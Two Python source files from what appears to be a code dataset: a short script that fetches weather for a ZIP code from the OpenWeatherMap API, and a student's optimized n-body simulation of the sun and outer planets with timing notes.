bfff4f70a9878de559700b5b455ab4217cdd590b | Python | fehbrize/what-to-wear | /main.py | UTF-8 | 934 | 3.140625 | 3 | [] | no_license | import json
import requests;
def retrieve_coordinates(zipcode):
req = requests.request('GET', 'http://api.openweathermap.org/geo/1.0/zip?zip=' + zipcode + ',US&appid=ce3cc47717e5e'
'239c048e33936caa91e')
return json.loads(req.content)
def retrieve_weather(lat, long):
req = requests.request('GET', 'https://api.openweathermap.org/data/2.5/onecall?lat=' + lat + '&lon=' + long +
'&units=imperial&exclude=minutely,alerts&appid=ce3cc47717e5e239c048e33936caa91e')
parsed_req = json.loads(req.content)
print(parsed_req['current'])
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
location = retrieve_coordinates('14623')
retrieve_weather(str(location['lat']), str(location['lon']))
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| true |
e667561355f9635fa9f59700d7ea5b0c3d360cf2 | Python | nyu-cds/asn264_assignment3 | /nbody_opt.py | UTF-8 | 4,152 | 2.78125 | 3 | [] | no_license | """
N-body simulation.
Aditi Nair (asn264)
Feb 10 2016
In this script, I combine all of the optimizations from earlier experiments.
TIME: 38.4250359535 SECONDS
RELATIVE SPEEDUP = 146.724272966/38.4250359535 ~= 3.8
"""
BODIES = {
'sun': ([0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 39.47841760435743),
'jupiter': ([4.84143144246472090e+00,
-1.16032004402742839e+00,
-1.03622044471123109e-01],
[0.606326392995832,
2.81198684491626,
-0.02521836165988763],
0.03769367487038949),
'saturn': ([8.34336671824457987e+00,
4.12479856412430479e+00,
-4.03523417114321381e-01],
[-1.0107743461787924,
1.8256623712304119,
0.008415761376584154],
0.011286326131968767),
'uranus': ([1.28943695621391310e+01,
-1.51111514016986312e+01,
-2.23307578892655734e-01],
[1.0827910064415354,
0.8687130181696082,
-0.010832637401363636],
0.0017237240570597112),
'neptune': ([1.53796971148509165e+01,
-2.59193146099879641e+01,
1.79258772950371181e-01],
[0.979090732243898,
0.5946989986476762,
-0.034755955504078104],
0.0020336868699246304)}
BODIES_KEYS = ['sun', 'jupiter', 'saturn', 'uranus', 'neptune']
def advance(BODIES, BODIES_KEYS, dt, iterations):
'''
advance the system one timestep
Initially: modified extra function calls here. Later: did not call, and put directly into nbody fn
'''
for _ in range(iterations):
for idx, body1 in enumerate(BODIES_KEYS):
([x1, y1, z1], v1, m1) = BODIES[body1]
for body2 in BODIES_KEYS[idx+1:]:
([x2, y2, z2], v2, m2) = BODIES[body2]
(dx, dy, dz) = (x1-x2, y1-y2, z1-z2)
val = dt * ((dx * dx + dy * dy + dz * dz) ** (-1.5))
m2_val = m2*val
m1_val = m1*val
v1[0] -= dx * m2_val
v1[1] -= dy * m2_val
v1[2] -= dz * m2_val
v2[0] += dx * m1_val
v2[1] += dy * m1_val
v2[2] += dz * m1_val
for body in BODIES_KEYS:
(r, [vx, vy, vz], m) = BODIES[body]
r[0] += dt * vx
r[1] += dt * vy
r[2] += dt * vz
def report_energy(BODIES, BODIES_KEYS, e=0.0):
'''
compute the energy and return it so that it can be printed
'''
seenit = set()
for idx, body1 in enumerate(BODIES_KEYS):
((x1, y1, z1), v1, m1) = BODIES[body1]
for body2 in BODIES_KEYS[idx+1:]:
((x2, y2, z2), v2, m2) = BODIES[body2]
(dx, dy, dz) = (x1-x2, y1-y2, z1-z2)
e -= (m1 * m2) / ((dx * dx + dy * dy + dz * dz) ** 0.5)
for body in BODIES_KEYS:
(r, [vx, vy, vz], m) = BODIES[body]
e += m * (vx * vx + vy * vy + vz * vz) / 2.
return e
def offset_momentum(BODIES, BODIES_KEYS, ref, px=0.0, py=0.0, pz=0.0):
'''
ref is the body in the center of the system
offset values from this reference
'''
for body in BODIES_KEYS:
(r, [vx, vy, vz], m) = BODIES[body]
px -= vx * m
py -= vy * m
pz -= vz * m
(r, v, m) = ref
v[0] = px / m
v[1] = py / m
v[2] = pz / m
def nbody(loops, reference, iterations):
'''
nbody simulation
loops - number of loops to run
reference - body at center of system
iterations - number of timesteps to advance
'''
offset_momentum(BODIES, BODIES_KEYS, BODIES[reference])
for _ in range(loops):
advance(BODIES, BODIES_KEYS, dt=0.01, iterations=iterations)
print(report_energy(BODIES, BODIES_KEYS))
if __name__ == '__main__':
import timeit
print timeit.timeit("nbody(100, 'sun', 20000)", setup="from __main__ import nbody", number=1)
| true |